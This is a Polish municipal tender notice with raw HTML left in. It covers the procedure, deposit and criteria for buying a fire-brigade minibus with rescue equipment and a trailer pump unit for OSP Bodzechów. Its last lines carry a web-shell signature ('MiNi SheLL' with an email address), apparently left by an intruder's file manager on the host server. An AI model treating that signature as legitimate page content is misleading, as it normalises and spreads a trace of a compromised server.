Oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej 
Oświadczenie należy złożyć w oparciu o zamieszczony na stronie internetowej Zamawiającego www.bip.bodzechow.wrota-swietokrzyskie.pl wykaz złożonych w danym postępowaniu ofert, zgodnie z zamieszczonym w SIWZ wzorem (Załącznik nr 7 do SIWZ).
W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej składa każdy z wykonawców.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca składając ofertę zobowiązany jest wnieść wadium w wysokości odpowiednio:
Zadanie 1:  2 000  zł
Zadanie 2:  2000 zł
w terminie do dnia 30.01.2017 r.  do godziny 10.00.

Wadium może być wnoszone w następujących formach:
a) pieniądzu przelewem na rachunek bankowy na konto Zamawiającego: 
             B.S. w Ostrowcu Św. 57 8507 0004 2001 0047 6733 0003
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.  z 2016r. poz. 359).
3. Wadium wnoszone w innych niż pieniądz formach, należy złożyć najpóźniej wraz  z ofertą (jako oddzielny od oferty dokument) lub w Kasie Urzędu Gminy Bodzechów,  tj. w Ostrowcu Świętokrzyskim przy ul. Mikołaja Reja 10, od poniedziałku do piątku w godz. 7:00 -14:00.
4. Wadium wpłacane w pieniądzu winno znajdować się na koncie zamawiającego w dniu otwarcia ofert.
5. Wadium wniesione w formie poręczeń lub gwarancji musi zawierać zobowiązanie gwaranta lub poręczyciela do bezwarunkowej zapłaty Zamawiającemu pełnej kwoty wadium, na każde jego żądanie w terminie związania ofertą, w okolicznościach określonych w art. 46 ust. 5 ustawy  Prawo zamówień publicznych.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>30</td></tr><tr><td>termin dostawy</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 30/01/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa samochodu strażackiego wraz z wyposażeniem ratującym życie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Samochód specjalny typu mikrobus, nowy, 9 - osobowy, przeznaczony do działań ratowniczych                          o minimalnych parametrach:
1. spełnia wymagania prawa o ruchu drogowym (ważna homologacja na samochód bazowy),
2. spełnia wymagania dla pojazdu straży pożarnej uprzywilejowanego w ruchu, zgodnie z prawem            o ruchu drogowym,
3. samochód posiadający wydzieloną pełną ścianką część bagażową, ścianka demontowalna,
4. wykonany w nadwoziu samochodu o dopuszczalnej masie całkowitej nie przekraczającej 3500 kg,
5. dopuszczalna ładowność co najmniej 1400 kg,
6. wymiary pojazdu:
a. pojazd o rozstawie osi co najmniej 3400 mm
b. przedział tylni o długości min. 3100 mm
c. wysokość wnętrza co najmniej 1700 mm
7. napęd - silnik wysokoprężny, spełniający normy czystości spalin zgodnie z przepisami ustawy prawo o ruchu drogowym bez konieczności stosowania dodatkowych płynów w układzie spalinowym o mocy co najmniej 120 KM
8. samochód wyposażony w napęd jednej osi  przedniej,
9. układ kierowniczy - ze wspomaganiem,
10. układ hamulcowy - hydrauliczny ze wspomaganiem, wyposażony w układ
ABS, ASR, EBS,
11. ilość miejsc siedzących  9; możliwość szybkiego demontażu tylnych rzędów foteli dla zapewnienia dużej przestrzeni ładunkowej,
12. przynajmniej 2 poduszki powietrzne dla kierowcy i pasażera,
13. ilość drzwi co najmniej 4 (minimum 2 boczne przednie uchylne, 1 boczne przesuwne, 1 tylne)
14. boczne drzwi przesuwne oraz przedział załogowy  przeszklone szybami przyciemnionymi ,
15. klimatyzacja  osobna regulacja przedziału załogi i kabiny kierowcy, 
16. dodatkowe ogrzewanie przedziału załogi,
17. minimum jedna szyba w przedziale załogowym przesuwna,
18. kolorystyka i oznaczenia pojazdu:
a. kolor nadwozia czerwony lub biały
b. oznakowanie pojazdu  zgodne z zarządzeniem nr 8/2008 Komendanta Głównego Państwowej Straży Pożarnej,
19. kabina kierowcy oraz przedział załogowy wyciszone (tapicerka, podsufitka),
20. przedział załogowy oraz przedział ładunkowy wyposażone w zmywalną podłogę (np. trudno ścieralne PCV),
21. należy przewidzieć co najmniej jeden zamykany schowek, zaleca się aby w kabinie kierowcy znajdowały się praktyczne schowki w drzwiach i desce rozdzielczej,
22. dodatkowe wyposażenie samochodu:
a. oświetlenie pojazdu uprzywilejowanego w ruchu: belka sygnałowa + stroboskopy przednie oraz pojedyncza lampa "kogut" koloru niebieskiego z tyłu pojazdu; moc wzmacniacza urządzenia do
nadawania komunikatów głosowych co najmniej 100 W, 3 sygnały modulowane,
 b. zabudowany w kabinie radiotelefon samochodowy analogowo - cyfrowy o następujących parametrach:
- moc min. 25W
- min. 250 kanałów
- częstotliwość 142  174 MHz
- odstęp międzykanałowy 12,5 kHz  
- antena  lambda na sprężynie przykręcana motylkiem z możliwością regulacji (nie sztywna) z kablem 50 Omów i wtykiem BMC.
c. radioodtwarzacz CD z minimum 4 głośnikami, USB
d. bagażnik dachowy z minimum dwoma poprzeczkami do przewozu długich przedmiotów np. drabin pożarniczych
e. drabinka umożliwiająca wejście na dach mocowana z tyłu nadwozia,
f. dwa komplety kół (sezonowych)
g. pełnowymiarowe koło zapasowe
h. centralny zamek ze zdalnym sterowaniem
i. elektrycznie podnoszone szyby kierowcy i pasażera,
j. elektrycznie regulowane i podgrzewane lusterka,
k. gniazdo 12 V w przedziale ładunkowym,
l. dywaniki gumowe w kabinie kierowcy
m. w przedziale ładunkowym zamontowane wieszaki lub poprzeczna belka pod sufitem na 9 kompletów umundurowania,
n. oświetlenie dachu (typu szperacz),
o. markiza (roleta boczna) do busa,
p. zaczep holowniczy, posiadający homologację lub znak bezpieczeństwa, umożliwiający holowanie przyczep również z zaczepem kulowym.
W okresie gwarancji przeglądy  będą wykonywane na koszt ZAMAWIAJĄCEGO w autoryzowanych serwisach
 Czas przystąpienia serwisu do naprawy 72 godz. od zgłoszenia usterki lub zgłoszenia samochodu do przeglądu (bez wliczania dni ustawowo wolnych od pracy)
 Ilość punktów serwisowych na terenie RP wykonujących wszystkie naprawy  min. 1
Wyposażenie ratujące życie:
1.	Defibrylator wraz z wyposażeniem dodatkowym:
-  szczelność: odporność na strumień wody IPX5, zgodnie z IEC60529
- temperatura pracy/gotowości: 0-50 C
- zasilanie: typ 9V DC, 4,2 Ah, dwutlenek litowo-magnezowy, jednorazowa bateria podstawowa, nie wymaga doładowania
2. Zestaw do wyważania drzwi i cięcia pedałów- do zastosowania podczas otwierania metalowych drzwi ze skomplikowanymi zamkami lub drzwi przeciwpożarowych w czasie prowadzenia akcji ratowniczych, do cięcia w ograniczonej przestrzeni:
- cięcie wewnątrz samochodu, np. koła kierownicy, dźwigni zmiany biegów i pedałów
- przecinanie prętów zbrojeniowych i innych materiałów konstrukcyjnych w budynkach
- poręczny i lekki
- charakteryzujący się brakiem iskrzenia (w miejscach zagrożonych wybuchem)
- do otwierania metalowych drzwi przeciwpożarowych
- praktyczna waliza ułatwiająca przechowywanie i transport
Skład zestawu:
- wyważacz do drzwi
- przecinacz pedałów
- pompka ręczna
- wąż
Minimalne parametry techniczne:
- siła cięcia 75 kN
- siła rozpierania 90 kN
- skok 100mm
- rozwarcie ostrzy 40 mm
Wykonawca przekaże użytkownikowi końcowemu dokumenty niezbędne do zarejestrowania samochodu. Samochód wraz z wyposażeniem zostanie dostarczony do siedziby OSP Bodzechów (27  420 Bodzechów, ulica Opatowska 13 ).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34144210-3, 33182100-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 10/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>60</td></tr><tr><td>okres gwarancji</td><td>30</td></tr><tr><td>termin dostawy</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa agregatu pompowego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Agregat pompowy na przyczepie dwuosiowej z hamulcem najazdowym o minimalnych parametrach technicznych:
1.	wydajność: Q=200 ÷ 700 m3/h 
2.	Średnica króćca ssawnego 300mm, średnica króćca tłocznego 300mm z redukcjami na 2x200mm każdy
3.	Całkowita  wysokość podnoszenia H- 17÷7 m
4.	Manometryczna minimalna wysokość ssania Hmm=6m
5.	silnik spalinowy
6.	moc silnika min. 32 kW
7.	wyposażenie:
- 2 linie ssawne  o średnicy200mm każda składające się razem z  8 szt. węży w odcinkach 2,5m zakończonych szybkozłączkami oraz 2 koszami ssawnymi
 - 2 linie tłoczne o średnicy 200mm składające się z węży  o długości 2x 25 mb zakończone szybkozłączkami 
8.  przyczepa wyposażona w zaczep kulowy z możliwością zamiany na dyszel z regulowana wysokością, przystosowany do haka holowniczego paszczowego (typ 40)
9. pompa w korpusie posiada nasadę W52 typu Storz z zaślepką służącą do zalewania pompy
10. redukcje tłoczne z 200 na 3x110 z nasadami typu Storz oraz zaślepkami- 2 sztuki
Agregat pompowy zostanie dostarczony do siedziby OSP Bodzechów (27  420 Bodzechów, ulica Opatowska 13 ).

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34144213-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 10/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>60</td></tr><tr><td>okres gwarancji</td><td>30</td></tr><tr><td>termin dostawy</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com